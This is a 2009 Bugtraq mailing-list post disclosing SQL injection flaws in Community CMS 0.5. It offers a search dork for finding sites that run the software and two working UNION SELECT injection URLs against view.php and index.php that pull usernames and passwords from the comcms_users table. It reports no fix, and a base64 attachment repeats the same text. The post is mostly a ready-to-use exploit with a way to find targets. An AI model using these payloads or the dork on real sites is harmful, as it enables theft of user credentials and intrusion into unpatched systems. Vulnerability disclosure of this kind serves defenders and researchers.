Community CMS 0.5 Multiple SQL Injection Vulnerabilities
Date: Mon, 30 Mar 2009 21:55:45 +0200
Subject: Community CMS 0.5 Multiple SQL Injection Vulnerabilities
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: multipart/mixed; boundary=001636c5b2f0d8529804665b7783
X-Virus-Scanned: antivirus-gw at tyumen.ru
--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Community CMS
[+] Version: 0.5
[+] Website: http://sourceforge.net/projects/communitycms/
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] File affected: view.php, calendar.php
This bug allows a guest to view username and
password of a registered user.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT
1,2,username,password,5,6,7,8,9 FROM comcms_users
http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c5b2f0d8529804665b7783
Content-Type: text/plain; charset=US-ASCII;
name="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Disposition: attachment;
filename="Community CMS 0.5 Multiple SQL Injection Vulnerabilities-30032009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fsxky3lr0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBDb21tdW5pdHkgQ01TClsrXSBWZXJzaW9uOiAwLjUKWytdIFdlYnNpdGU6IGh0
dHA6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvY29tbXVuaXR5Y21zLwoKWytdIEJ1Z3M6IFtB
XSBNdWx0aXBsZSBTUUwgSW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERv
cms6IGludGV4dDoiUG93ZXJlZCBieSBDb21tdW5pdHkgQ01TIgpbK10gRGF0ZTogMzAgTWFyIDIw
MDkKClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10g
QXV0aG9yOiBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YQpbK10gQ29udGFjdDogZS1tYWls
OiBkcm9zb3BoaWxheHh4QGdtYWlsLmNvbQoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioKClsrXSBNZW51CgoxKSBCdWdzCjIpIENvZGUKMykgRml4CgoK
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEJ1
Z3MKCgotIFtBXSBTUUwgSW5qZWN0aW9uCgpbLV0gRmlsZSBhZmZlY3RlZDogdmlldy5waHAsIGNh
bGVuZGFyLnBocAoKVGhpcyBidWcgYWxsb3dzIGEgZ3Vlc3QgdG8gdmlldyB1c2VybmFtZSBhbmQK
cGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVzZXIuCgoKKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBNdWx0aXBsZSBTUUwg
SW5qZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvdmlldy5waHA/YXJ0aWNsZV9pZD0t
MSBVTklPTiBBTEwgU0VMRUNUIDEsMix1c2VybmFtZSxwYXNzd29yZCw1LDYsNyw4LDkgRlJPTSBj
b21jbXNfdXNlcnMKCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC9pbmRleC5waHA/aWQ9MiZ2aWV3
PWV2ZW50JmE9LTEgVU5JT04gQUxMIFNFTEVDVCAxLDIsMyw0LDUsNiw3LENPTkNBVCh1c2VybmFt
ZSwgMHgzYSwgcGFzc3dvcmQpLE5VTEwsTlVMTCxOVUxMLDEyLDEzLE5VTEwgRlJPTSBjb21jbXNf
dXNlcnMlMjMKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqCgpbK10gRml4CgpObyBmaXguCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKg==
--001636c5b2f0d8529804665b7783--
